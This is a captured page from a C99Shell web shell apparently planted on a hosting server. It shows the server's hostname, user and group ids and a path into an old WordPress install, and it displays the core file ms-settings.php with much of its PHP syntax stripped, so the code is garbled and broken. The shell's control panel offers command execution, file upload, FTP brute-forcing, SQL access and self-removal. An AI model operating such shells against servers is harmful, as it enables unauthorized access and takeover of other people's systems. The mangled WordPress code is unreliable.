!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-includes/   drwxr-xr-x
Free 183.04 GB of 490.84 GB (37.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ms-settings.php (3.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Used to set up and fix common variables and include
 * the Multisite procedural and class library.
 *
 * Allows for some configuration in wp-config.php (see ms-default-constants.php)
 *
 * @package WordPress
 * @subpackage Multisite
 * @since 3.0.0
 */

/**
 * Objects representing the current network and current site.
 *
 * These may be populated through a custom `sunrise.php`. If not, then this
 * file will attempt to populate them based on the current request.
 *
 * @global WP_Network $current_site The current network.
 * @global object     $current_blog The current site.
 * @since 3.0.0
 */
global $current_site$current_blog;

/** WP_Network class */
require_once( ABSPATH WPINC '/class-wp-network.php' );

/** WP_Site class */
require_once( ABSPATH WPINC '/class-wp-site.php' );

/** Multisite loader */
require_once( ABSPATH WPINC '/ms-load.php' );

/** Default Multisite constants */
require_once( ABSPATH WPINC '/ms-default-constants.php' );

if ( 
defined'SUNRISE' ) ) {
    include_once( 
WP_CONTENT_DIR '/sunrise.php' );
}

/** Check for and define SUBDOMAIN_INSTALL and the deprecated VHOST constant. */
ms_subdomain_constants();

// This block will process a request if the current network or current site objects
// have not been populated in the global scope through something like `sunrise.php`.
if ( !isset( $current_site ) || !isset( $current_blog ) ) {

    
$domain strtolowerstripslashes$_SERVER['HTTP_HOST'] ) );
    if ( 
substr$domain, -) == ':80' ) {
        
$domain substr$domain0, -);
        
$_SERVER['HTTP_HOST'] = substr$_SERVER['HTTP_HOST'], 0, -);
    } elseif ( 
substr$domain, -) == ':443' ) {
        
$domain substr$domain0, -);
        
$_SERVER['HTTP_HOST'] = substr$_SERVER['HTTP_HOST'], 0, -);
    }

    
$path stripslashes$_SERVER['REQUEST_URI'] );
    if ( 
is_admin() ) {
        
$path preg_replace'#(.*)/wp-admin/.*#''$1/'$path );
    }
    list( 
$path ) = explode'?'$path );

    
$bootstrap_result ms_load_current_site_and_network$domain$pathis_subdomain_install() );

    if ( 
true === $bootstrap_result ) {
        
// `$current_blog` and `$current_site are now populated.
    
} elseif ( false === $bootstrap_result ) {
        
ms_not_installed$domain$path );
    } else {
        
header'Location: ' $bootstrap_result );
        exit;
    }
    unset( 
$bootstrap_result );

    
$blog_id $current_blog->blog_id;
    
$public  $current_blog->public;

    if ( empty( 
$current_blog->site_id ) ) {
        
// This dates to [MU134] and shouldn't be relevant anymore,
        // but it could be possible for arguments passed to insert_blog() etc.
        
$current_blog->site_id 1;
    }

    
$site_id $current_blog->site_id;
    
wp_load_core_site_options$site_id );
}

$wpdb->set_prefix$table_prefixfalse ); // $table_prefix can be set in sunrise.php
$wpdb->set_blog_id$current_blog->blog_id$current_blog->site_id );
$table_prefix $wpdb->get_blog_prefix();
$_wp_switched_stack = array();
$switched false;

// need to init cache again after blog_id is set
wp_start_object_cache();

if ( ! 
$current_site instanceof WP_Network ) {
    
$current_site = new WP_Network$current_site );
}

if ( ! 
$current_blog instanceof WP_Site ) {
    
$current_blog = new WP_Site$current_blog );
}

// Define upload directory constants
ms_upload_constants();

/**
 * Fires after the current site and network have been detected and loaded
 * in multisite's bootstrap.
 *
 * @since 4.6.0
 */
do_action'ms_loaded' );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0251 ]--